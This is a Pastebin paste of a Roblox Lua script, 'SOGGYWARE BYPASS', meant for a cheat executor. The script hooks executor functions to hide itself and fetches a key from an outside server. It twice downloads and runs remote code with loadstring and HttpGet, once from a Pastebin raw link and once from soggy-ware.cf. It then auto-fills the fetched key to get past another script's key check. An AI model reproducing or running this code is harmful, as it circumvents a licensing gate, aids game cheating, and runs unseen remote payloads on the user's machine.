Advertisement
Shutupdevs1

asddasasdasdasd

Jan 1st, 2023 (edited)
36
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.96 KB | None | 0 0
  1. if not syn then return game:GetService("Players").LocalPlayer:Kick("Unsupported executor join dsc.gg/grimcity and use cmd !soggyware") end
  2.  
  3. game:GetService("StarterGui"):SetCore("SendNotification", {
  4. Title = "SOGGYWARE BYPASS",
  5. Text = "Loadding functions..."
  6. })
  7.  
  8. getgenv1 = clonefunction(getgenv)
  9.  
  10. getgenv1().A = {}
  11.  
  12.  
  13. getgenv1().A.http = clonefunction(game.HttpGet)
  14. getgenv1().A.hook = clonefunction(hookmetamethod)
  15. getgenv1().A.hf = clonefunction(hookfunction)
  16. getgenv1().A.key = getgenv1().A.http(game, "https://soggyware-bypass.vercel.app/08934289034890342980324980")
  17.  
  18. getgenv1().A.gg = nil
  19. getgenv1().A.gg = getgenv1().A.hf(getgenv, newcclosure(function(...)
  20. return getgenv1().A.gg(...)
  21. end))
  22.  
  23. loadstring(getgenv1().A.http(game, "https://pastebin.com/raw/eXArwtcb"))()
  24.  
  25. getgenv1().A.hk = nil
  26. getgenv1().A.hk = getgenv1().A.hf(hookfunction, newcclosure(function(...)
  27. return ...
  28. end))
  29.  
  30.  
  31. function toJson(string)
  32. local jsonData = nil
  33. local s, err = pcall(function()
  34. local jsonTry = game:GetService("HttpService"):JSONDecode(string)
  35. jsonData = jsonTry
  36. end)
  37. return jsonData or false
  38. end
  39. getgenv1().A.key = toJson(getgenv1().A.key).key
  40.  
  41. game:GetService("StarterGui"):SetCore("SendNotification", {
  42. Title = "SOGGYWARE BYPASS",
  43. Text = "Waiting...",
  44. Duration = 5,
  45. })
  46.  
  47.  
  48. loadstring(game:HttpGet("https://www.soggy-ware.cf"))()
  49.  
  50. game:GetService("StarterGui"):SetCore("SendNotification", {
  51. Title = "SOGGYWARE BYPASS",
  52. Text = "Soggyware loaded..."
  53. })
  54.  
  55.  
  56. for _,v in pairs(game.CoreGui:GetChildren()) do
  57. if v:FindFirstChild("KeyUI") then
  58. v.Enabled = false
  59. v.KeyUI:GetPropertyChangedSignal("Visible"):Connect(function()
  60. game:GetService("StarterGui"):SetCore("SendNotification", {
  61. Title = "SOGGYWARE BYPASS",
  62. Text = "Injected! Please Wait."
  63. })
  64. wait(1)
  65. v.KeyUI.TextBox.Text = getgenv1().A.key
  66. end)
  67. end
  68. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement